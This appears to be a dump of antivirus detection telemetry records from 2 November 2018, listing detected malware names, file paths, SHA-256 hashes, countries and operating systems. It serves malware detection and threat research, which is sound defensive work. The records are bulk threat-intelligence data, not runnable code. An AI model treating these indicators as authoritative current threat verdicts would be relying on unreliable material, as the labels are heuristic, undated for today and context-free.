  Row(detection=Row(filename='avscan-20181102-140522-7ea89a7f', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_1cab3c85\\AVSCAN-20181102-140456-79007B41\\AVSCAN-20181102-140522-7EA89A7F', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:05:35Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-060131-9a9c8481', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_b5ce89ac\\AVSCAN-20181102-060118-981DBE86\\AVSCAN-20181102-060131-9A9C8481', filesize=1216000, name='HEUR/AGEN.1024609.#M1.#R1'), hash='306c10fc628385bbab90fd17720eeac239b7d8e001cdb72db68317631af13cc8', metadata=Row(cmdline=None, country='CH', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:01:34Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='63f991f524fd3469d5a133bb028a629a67d3f9ae56e1005cdd501d2e56a46040', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-36\\63F991F524FD3469D5A133BB028A629A67D3F9AE56E1005CDD501D2E56A46040', filesize=1792000, name='TR/Crypt.XPACK.Gen7.#M300.#R601541'), hash='63f991f524fd3469d5a133bb028a629a67d3f9ae56e1005cdd501d2e56a46040', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T13:57:50Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='mnnstubsetup.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\tmp8716972\\MNNStubSetup.exe', filesize=576000, name='HEUR/AGEN.1000022.#M1.#R1'), hash='182b23d0401d9ccd8adcc7da4cf30f1d174420f216f3f3e85661ccd9b044e446', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T18:40:11Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='searchprotocolhost.exe', filepath='d:\\windows\\softwaredistribution\\download\\4d6e4034e4de9833cc65805f6368103f\\x86_windowssearchengine_31bf3856ad364e35_7.0.7601.23930_none_75d1609092e92648\\SearchProtocolHost.exe', filesize=192000, name='W32/Virut.Gen.#M1.#R1'), hash='2914ccbab7d20587d7ea59b3cbd8fff81972c4baf00d97d3582ca0362b73eaeb', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T09:38:29Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avirasecuritycenteragent.exe', filepath='C:\\Program Files\\Avira\\Antivirus\\AviraSecurityCenterAgent.exe', filesize=840000, name='W32/Sality.Patched.#M1.#R1'), hash='4d3390f1bd3f6b3986e670c2eabfea2e528541ac16d0a33f07254858aaf4e781', metadata=Row(cmdline=None, country='BO', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\AVAST Software\\Avast\\AvastSvc.exe', parentsize=325024, timestamp='2018-11-02T19:15:21Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-161750-611a34df', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_0858748c\\AVSCAN-20181102-161538-52C9C851\\AVSCAN-20181102-161750-611A34DF', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T09:17:51Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='maintenancesservices.dll', filepath='\\\\?\\c:\\windows\\system32\\maintenancesservices.dll', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:34:47Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='flashupdate (1).exe', filepath='C:\\Users\\X\\Documents\\Downloads\\flashupdate (1).exe', filesize=1536000, name='TR/CoinMiner.CY.#M1.#R1'), hash='53f241e48edce037f68543a11c57cf05e084d97d6dc173ac163fec4d9fd50b02', metadata=Row(cmdline='-k LocalSystemNetworkRestricted', country='BA', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=20992, timestamp='2018-11-02T19:08:04Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-194902-092d2db9', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_51b8112a\\AVSCAN-20181102-194642-FC25D1A4\\AVSCAN-20181102-194902-092D2DB9', filesize=640000, name='Adware/DealPly.3c8ebd.#M1.#R1'), hash='3c8ebdd436177dc27e91b78ce326e7565d0ea00cdffd6545048e9b2987c59075', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-02T22:49:11Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avirasecuritycenteragent.exe', filepath='C:\\Program Files\\Avira\\Antivirus\\avirasecuritycenteragent.exe', filesize=840000, name='W32/Sality.Patched.#M1.#R1'), hash='4d3390f1bd3f6b3986e670c2eabfea2e528541ac16d0a33f07254858aaf4e781', metadata=Row(cmdline=None, country='BO', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\AVAST Software\\Avast\\AvastSvc.exe', parentsize=325024, timestamp='2018-11-02T11:05:13Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='62630287bd4504bfccbff92db41f6b17de3e8130960822b2382950fd3bf55768', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-19\\62630287BD4504BFCCBFF92DB41F6B17DE3E8130960822B2382950FD3BF55768', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='62630287bd4504bfccbff92db41f6b17de3e8130960822b2382950fd3bf55768', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T06:07:52Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-100226-1ca1a0d5', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_0b3c77d8\\AVSCAN-20181102-100046-0F54566B\\AVSCAN-20181102-100226-1CA1A0D5', filesize=1536000, name='TR/CoinMiner.CY.#M1.#R1'), hash='53f241e48edce037f68543a11c57cf05e084d97d6dc173ac163fec4d9fd50b02', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:59:52Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:29:21Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:28:51Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R3387'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T08:01:13Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T08:01:06Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='yahoo! powered fodar', filepath='C:\\Windows\\System32\\Tasks\\Yahoo! Powered fodar', filesize=4000, name='HTML/ExpKit.Gen.#M1.#R1'), hash='35d68f729ac3beb6920e8a8f9bd7a7ee7fb5ef5ac1761d2d1f86d580d9c4e9e0', metadata=Row(cmdline=None, country='AT', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T16:11:07Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='9fdbe38b-3efb-bc9f-c033-5a35f6c0a759.exe', filepath='E:\\\xa0\\{16b7852e-3756-be20-2883-e519cdf11fc3}\\9fdbe38b-3efb-bc9f-c033-5a35f6c0a759.exe', filesize=256000, name='TR/Dropper.Gen.#M300.#R4148'), hash='216d36a242cafd0951935727d497baeffb715f17f5c665a9f89073814a7f4a0c', metadata=Row(cmdline='-r', country='IN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\Kaspersky Lab\\Kaspersky Internet Security 18.0.0\\avp.exe', parentsize=354672, timestamp='2018-11-02T10:33:50Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-182216-1802ef01', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_23c10ab5\\AVSCAN-20181102-173208-165F3A81\\AVSCAN-20181102-182216-1802EF01', filesize=840000, name='TR/Miner.OA.#M1.#R1'), hash='0978fcc7db3a27e180fca68b33d99c6bbe8173054f1cd0ebfd0fe0be35667656', metadata=Row(cmdline=None, country='GE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T14:22:14Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:35:53Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='4760af21681eae98013c3d488410531dae5a06ec901f9ed9edf822c58a45afd6', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-29\\4760AF21681EAE98013C3D488410531DAE5A06EC901F9ED9EDF822C58A45AFD6', filesize=1856000, name='HEUR/AGEN.1029502.#M1.#R1'), hash='4760af21681eae98013c3d488410531dae5a06ec901f9ed9edf822c58a45afd6', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T13:24:54Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T08:04:43Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:54:00Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='setup.exe', filepath='C:\\Program Files (x86)\\Intel\\Intel(R) Processor Graphics\\uninstall\\Setup.exe', filesize=1096000, name='W32/Jeefo.A.#M1.#R1'), hash='32b40409c157056050fd928b0ff73ffe9b91fc84f5c765b028d88b1a864b4b89', metadata=Row(cmdline='\\\\\\/Processid:{06622D85-6856-4460-8DE1-A81921B41C4B}', country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\SysWOW64\\dllhost.exe', parentsize=7168, timestamp='2018-11-02T07:35:00Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:31:24Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='agendador-backup-2017_06_12_17_35_22.exe', filepath='C:\\Users\\X\\Desktop\\NextAgeERP\\Agendador-Backup-2017_06_12_17_35_22.exe', filesize=1984000, name='TR/Dropper.Gen.#M300.#R3643'), hash='09cfdeff217e6d6108b424c437e1fceeb8faaa3efca07e659c4e6e2616bbc7c6', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe38_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe38 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='BR', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=272896, timestamp='2018-11-02T01:31:46Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:20:11Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='msimg32.dll', filepath='C:\\Users\\X\\Desktop\\set\\msimg32.dll', filesize=4736000, name='TR/Agent.87443.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline=None, country='MY', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Users\\X\\Desktop\\set\\Setup.exe', parentsize=1551000, timestamp='2018-11-02T09:43:40Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:55:03Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:39:09Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:15:38Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:49:50Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='iocd67c7687-6dd5-1741-9c62-228d9d2b00c6.exe', filepath='C:\\ProgramData\\Kaspersky Lab\\AVP18.0.0\\Temp\\iocD67C7687-6DD5-1741-9C62-228D9D2B00C6.exe', filesize=16416000, name='TR/Patched.Ren.Gen.#M300.#R4405'), hash='153672a8a39883d8fb5baf76454c9145ca648f8b6f3b8d32afe39dd96807095d', metadata=Row(cmdline='-r', country='TR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\Kaspersky Lab\\Kaspersky Anti-Virus 18.0.0\\avp.exe', parentsize=354672, timestamp='2018-11-02T18:59:10Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-184338-f2ee3ca8', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_23c10ab5\\AVSCAN-20181102-173208-165F3A81\\AVSCAN-20181102-184338-F2EE3CA8', filesize=840000, name='TR/Miner.OA.#M1.#R1'), hash='0978fcc7db3a27e180fca68b33d99c6bbe8173054f1cd0ebfd0fe0be35667656', metadata=Row(cmdline=None, country='GE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T14:43:37Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:33:59Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:27:29Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:16:44Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='662f636ba2e6eae4b1ad17f0f02c75e7ac9bfb244af088e4dee3c8716eee5cd8', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-7\\662F636BA2E6EAE4B1AD17F0F02C75E7AC9BFB244AF088E4DEE3C8716EEE5CD8', filesize=152000, name='TR/Dropper.Gen.#M300.#R324'), hash='662f636ba2e6eae4b1ad17f0f02c75e7ac9bfb244af088e4dee3c8716eee5cd8', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T11:23:37Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='dafsbrfh.exe', filepath='f:\\recycler\\s-7-5-57-0134166447-0306465866-823005636-0523\\dafsBrfH.exe', filesize=1856000, name='TR/Offend.725658.#M1.#R1'), hash='501f5d130f21168f1530615de806173017ffe466b5d377a4f06d9111b9127be7', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T13:26:18Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-050737-2f710aae', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-050737-2F710AAE', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:07:35Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='installe.', filepath='CLICK_HE.APP/CONTENTS/MACOS/INSTALLE.', filesize=196000, name='Adware/OSX.Genieo.royik.#M0.#R0'), hash='4f3bf2d058a655b6a22a8c5b797e3fe169ea02a3c51b7f9bffccd261590a6283', metadata=Row(cmdline=None, country='US', os_name='MacOS', os_vmajor='18', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T13:00:10Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052251-5063fdb4', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052251-5063FDB4', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:22:50Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051705-81e86061', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051705-81E86061', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:17:03Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053117-7de0fa9a', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053117-7DE0FA9A', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:31:16Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-054539-7fe21980', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-054539-7FE21980', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:45:38Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052226-41427878', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052226-41427878', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:22:24Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='msimg32.dll', filepath='C:\\Users\\X\\Desktop\\msimg32.dll', filesize=4736000, name='TR/Agent.87443.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline=None, country='NL', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Users\\X\\Desktop\\Setup.exe', parentsize=1551000, timestamp='2018-11-02T10:28:42Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='dealplylive.exe', filepath='\\\\?\\C:\\Program Files\\DealPlyLive\\Update\\DealPlyLive.exe', filesize=148000, name='ADWARE/DealPly.Gen4.#M300.#R300171'), hash='5f456982046db60202faa8a29d13eb84860f00a648b39919dded52111b130275', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T15:16:36Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052101-0ecd0fdc', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052101-0ECD0FDC', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:21:00Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='msimg32.dll', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\Rar$EXa0.587\\msimg32.dll', filesize=4736000, name='TR/Agent.87443.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline=None, country='CH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Users\\X\\AppData\\Local\\Temp\\Rar$EXa0.587\\Setup.exe', parentsize=1551000, timestamp='2018-11-02T10:51:56Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='samp-server.exe', filepath='D:\\Games\\samp-server.exe', filesize=1024000, name='W32/Sality.AT.#M1.#R1'), hash='48a4dba98cbe22be684c6cd6f5b8ccc44b53cf9276b939cb947184288be56b41', metadata=Row(cmdline='mmbb5544 31343230303833323136313130383030333634 58', country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='F:\\WolfTeamAS\\Wolfteam.bin', parentsize=7464104, timestamp='2018-11-02T10:49:04Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='pdf_contract agreement.tar --> j111.exe', filepath='pdf_CONTRACT AGREEMENT.tar --> J111.exe', filesize=1152000, name='DR/Delphi.6abe65.#M1.#R1'), hash='6abe6528568d3820b27e309c4369b24bf0f1dc41bf8c3774d9c2526104f6a5ff', metadata=Row(cmdline=None, country='DE', os_name='Linux', os_vmajor='3', os_vminor='14', parentproc=None, parentsize=None, timestamp='2018-11-02T07:30:08Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='debit note  (xe 16cho tang cuong )đat.exe', filepath='F:\\\xa0\\DEBIT NOTE  (xe 16cho tang cuong )đat.exe', filesize=1664000, name='TR/ATRAPS.Gen4.#M300.#R300784'), hash='4a70b0e07d968653ff8a6266d5c1d18d9a9b2e5d4b27eeb46641ea8dde873023', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2872320, timestamp='2018-11-02T01:15:28Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055818-44334032', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055818-44334032', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:58:17Z'), dt=datetime.date(2018, 11, 2)),
